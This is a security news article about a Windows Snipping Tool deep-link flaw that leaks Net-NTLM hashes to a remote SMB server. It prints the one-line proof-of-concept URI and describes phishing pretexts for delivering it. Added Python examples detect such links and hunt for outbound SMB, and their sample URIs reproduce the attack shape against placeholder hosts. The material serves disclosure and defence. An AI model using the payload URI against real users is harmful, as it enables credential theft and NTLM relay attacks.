PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability - CyberSecurityNews
By Guru Baran
April 21, 2026
A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft’s Snipping Tool that allows attackers to silently steal users’ Net-NTLM credential hashes by luring them to a malicious webpage.
Tracked as CVE-2026-33829, the flaw lies in how the Windows Snipping Tool handles the deep link it registers for the ms-screensketch URI scheme. Affected versions register this handler, and its edit action accepts a filePath parameter.
Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim’s Net-NTLM hash in the process.
The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.
Windows Snipping Tool PoC
Exploitation requires minimal technical sophistication. An attacker only needs to host a malicious URL, or an HTML page that auto-triggers the deep link, and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI:
ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast
When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, the SMB client automatically authenticates with the user's Net-NTLM response, handing the attacker's server a hash that can be cracked offline, or an authentication that can be relayed against internal network resources in an NTLM relay attack.
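The check a mail or web gateway would want to apply to links of this shape, as an added example that is not part of the article or of Black Arrow's PoC: parse the ms-screensketch deep link, decode the filePath parameter (attackers can percent-encode the backslashes in an href), and flag a UNC path whose host is outside the organisation. The sample URIs are constructed, and the definition of "internal" (RFC 1918 ranges, single-label names, and the placeholder DNS suffix corp.example) is an assumption to adapt to your environment.

```python
"""Triage ms-screensketch deep links: flag a filePath that is a UNC path to an external host.

Added example, not the article's or Black Arrow's code. Assumptions: candidate URIs
arrive as strings (e.g. extracted by a mail or web gateway), internal hosts sit on
RFC 1918 ranges or under the placeholder DNS suffix corp.example, and single-label
names resolve internally.
"""
import ipaddress
import re
from urllib.parse import parse_qs

INTERNAL_SUFFIXES = (".corp.example",)  # assumption: placeholder internal DNS suffix
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Matches \\host\share, //host/share and the long form \\?\UNC\host\share; captures the host.
UNC_RE = re.compile(r"^(?:\\\\\?\\UNC\\|\\\\|//)([^\\/]+)[\\/]")


def parse_deep_link(uri: str) -> dict:
    """Split 'scheme:action?query' into parts; parse_qs also decodes %5C and friends."""
    scheme, sep, rest = uri.partition(":")
    if not sep:
        raise ValueError(f"not a URI: {uri!r}")
    action, _, query = rest.partition("?")
    params = {k: v[0] for k, v in parse_qs(query).items()}
    return {"scheme": scheme.lower(), "action": action, "params": params}


def unc_host(path: str):
    """Return the host named by a UNC path, or None for local/relative paths."""
    m = UNC_RE.match(path)
    if not m:
        return None
    # host@port / host@SSL are still UNC hosts (WebDAV-style forms); keep the host part only
    return m.group(1).split("@", 1)[0]


def is_internal_host(host: str) -> bool:
    """IP literals are checked against RFC 1918; names against the internal suffix list."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        h = host.lower().rstrip(".")
        return h.endswith(INTERNAL_SUFFIXES) or "." not in h  # assumption: single-label = internal
    return any(ip in net for net in INTERNAL_NETS)


def assess(uri: str) -> dict:
    """Verdict for one URI: suspicious if filePath is a UNC path to a non-internal host."""
    verdict = {"uri": uri, "suspicious": False, "reason": ""}
    info = parse_deep_link(uri)
    if info["scheme"] != "ms-screensketch":
        return verdict
    host = unc_host(info["params"].get("filePath", ""))
    if host is None:
        return verdict
    if is_internal_host(host):
        verdict["reason"] = f"UNC filePath to internal host {host}"
    else:
        verdict["suspicious"] = True
        verdict["reason"] = f"UNC filePath to external host {host}"
    return verdict


# Constructed sample URIs (not real attack data): the PoC shape with a TEST-NET address,
# the same thing percent-encoded as it might sit in an HTML href, a local file, an internal share.
SAMPLES = [
    r"ms-screensketch:edit?&filePath=\\203.0.113.7\file.png&isTemporary=false&saved=true&source=Toast",
    "ms-screensketch:edit?filePath=%5C%5Csnip.example.com%5Cshare%5Cbadge.png&source=Toast",
    r"ms-screensketch:edit?filePath=C:\Users\alice\Pictures\shot.png",
    r"ms-screensketch:edit?filePath=\\fs01.corp.example\pictures\shot.png",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        v = assess(uri)
        print("SUSPICIOUS" if v["suspicious"] else "ok        ", v["reason"] or "no UNC filePath")
```

The parser deliberately ignores the scheme's other parameters: only filePath decides the verdict, and a local drive path or a share on an internal host passes. Forward-slash and `\\?\UNC\` spellings are accepted because the Windows path APIs accept them too, so a filter that only looks for a literal `\\` is easy to slip past.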
What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.
An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.
The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background.
This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.
Patch Availability and Timeline
Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:
March 23, 2026 — Vulnerability reported to Microsoft.
April 14, 2026 — Microsoft releases a security patch.
April 14, 2026 — Coordinated public advisory and PoC release.
Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update.
Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.
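The monitoring recommended above, as an added example that is not from the article: a small hunt over connection telemetry that flags outbound SMB (445 or 139) to non-internal addresses and, for each hit, records which web clients on the same workstation connected out in the preceding minute, which is the "visited a page, then SMB went out" sequence this attack produces. The CSV columns, the constructed log lines (TEST-NET addresses, fictitious hosts), the 60-second window and the use of RFC 1918 as "internal" are all assumptions.

```python
"""Hunt for outbound SMB to non-internal hosts, and whether a web connection preceded it.

Added example, not from the article. Assumes connection telemetry exported as CSV with
the columns below (roughly what Sysmon Event ID 3 or a host firewall log provides) and
that RFC 1918 space is 'internal'. The log is constructed sample data.
"""
import csv
import io
import ipaddress
from datetime import datetime, timedelta

SMB_PORTS = {445, 139}
WEB_PORTS = {80, 443}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample. The SMB rows carry image=System because the SMB client lives in the
# kernel, so telemetry typically attributes the connection to System, not to the app that
# asked for the file; do not key the hunt on the Snipping Tool's image name.
CONSTRUCTED_LOG = """\
timestamp,host,image,src_ip,src_port,dst_ip,dst_port
2026-04-21T09:58:02Z,WS-042,chrome.exe,10.0.5.17,51002,203.0.113.7,443
2026-04-21T09:58:05Z,WS-042,System,10.0.5.17,51011,10.0.1.20,445
2026-04-21T09:58:09Z,WS-042,System,10.0.5.17,51014,203.0.113.7,445
2026-04-21T10:01:40Z,WS-019,System,10.0.7.3,49877,198.51.100.23,139
2026-04-21T10:02:11Z,WS-019,outlook.exe,10.0.7.3,49880,198.51.100.23,443
"""


def _ts(s: str) -> datetime:
    # A trailing 'Z' only parses natively on Python 3.11+, so normalise it first
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def is_internal_ip(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_external_smb(log_text: str, web_window: timedelta = timedelta(seconds=60)) -> list:
    """Return external-SMB connections, each with the web-client images seen on the same
    workstation in the preceding window (the 'visited a page, then SMB went out' pattern)."""
    rows = list(csv.DictReader(io.StringIO(log_text)))
    hits = []
    for row in rows:
        if int(row["dst_port"]) not in SMB_PORTS or is_internal_ip(row["dst_ip"]):
            continue
        t = _ts(row["timestamp"])
        prior_web = {
            r["image"] for r in rows
            if r["host"] == row["host"] and int(r["dst_port"]) in WEB_PORTS
            and timedelta(0) <= t - _ts(r["timestamp"]) <= web_window
        }
        hits.append({
            "timestamp": row["timestamp"],
            "host": row["host"],
            "dst": f"{row['dst_ip']}:{row['dst_port']}",
            "preceded_by_web": sorted(prior_web),
        })
    return hits


if __name__ == "__main__":
    for hit in find_external_smb(CONSTRUCTED_LOG):
        print(hit)
```

On the sample data the hunt returns two hits: WS-042 reaching 203.0.113.7:445 seven seconds after chrome.exe talked to the same address over 443, and WS-019 reaching 198.51.100.23:139 with no web connection in the preceding minute. The first is the pattern to escalate; the second still deserves a look, because outbound SMB to the internet should not happen at all once the perimeter block the article recommends is in place.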
Guru Baran, https://cybersecuritynews.com
Gurubaran KS is a cybersecurity analyst, and Journalist with a strong focus on emerging threats and digital defense strategies. He is the Co-Founder and Editor-in-Chief of Cyber Security News, where he leads editorial coverage on global cybersecurity developments.